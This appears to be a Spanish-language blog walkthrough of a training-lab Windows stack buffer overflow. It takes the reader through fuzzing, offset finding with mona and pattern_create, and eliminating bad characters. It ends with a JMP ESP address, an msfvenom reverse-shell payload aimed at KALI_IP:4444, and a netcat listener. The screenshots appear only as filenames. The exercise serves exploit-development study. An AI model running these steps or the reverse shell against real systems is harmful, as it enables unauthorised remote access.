python fuzzer.py

Pasted image 20210617090729.png

/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb -l 1100 o se puede usar esto msf-pattern_create -l 1400

Pasted image 20210617090913.png

python3 exploit.py

!mona findmsp -distance 1400

Pasted image 20210617091059.png

Ahora cambiamos el offset en el archivo de exploit.py al numero offset Y tambien rtn le ponemos un valor de "BBBB"

Reiniciar app

!mona bytearray -b "\x00"

chequear que bytearray.bin este generado en el folder de mona

python3 bad_characters.py

Pasted image 20210616112718.png

Reiniciar app Pegar el output a payload

!mona compare -f C:\mona\oscp\bytearray.bin -a <address>

Pasted image 20210617092500.png

escribimos los bad chars 00 08 09 2c 2d ad ae

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210617092632.png

Le quitamos el x08 del payload hasta llegar al ultimo bad_char

Pasted image 20210617092704.png

Ahora los bad chars son:09 2c 2d ad ae \x00\x08

Reiniciar app y correr exploit.py Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210617092931.png

Le quitamos el x2c del payload hasta llegar al ultimo bad_char

Pasted image 20210617093103.png

Ahora los bad chars son:2d ad ae \x00\x08\x2c

Reiniciar app y correr exploit.py Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210617093329.png

Le quitamos el xad del payload hasta llegar al ultimo bad_char

Pasted image 20210617093453.png

Ahora los bad chars son: ae \x00\x08\x2c\xad

!mona jmp -r esp -cpb "\x00\x08\x2c\xad"

Pasted image 20210617093823.png

Agarramos el numero 625011af

Pasted image 20210617094030.png

cambiamos el rtn y iniciamos payload='' esto en exploit.py

msfvenom -p windows/shell\_reverse\_tcp LHOST=KALI_IP LPORT=4444 EXITFUNC=thread -b "\x00\x08\x2c\xad" -f c

padding = "\x90" * 16

nc -lvnp 4444

Pasted image 20210617094256.png

blog

copyright©2022 Cu3rv0x all rights reserved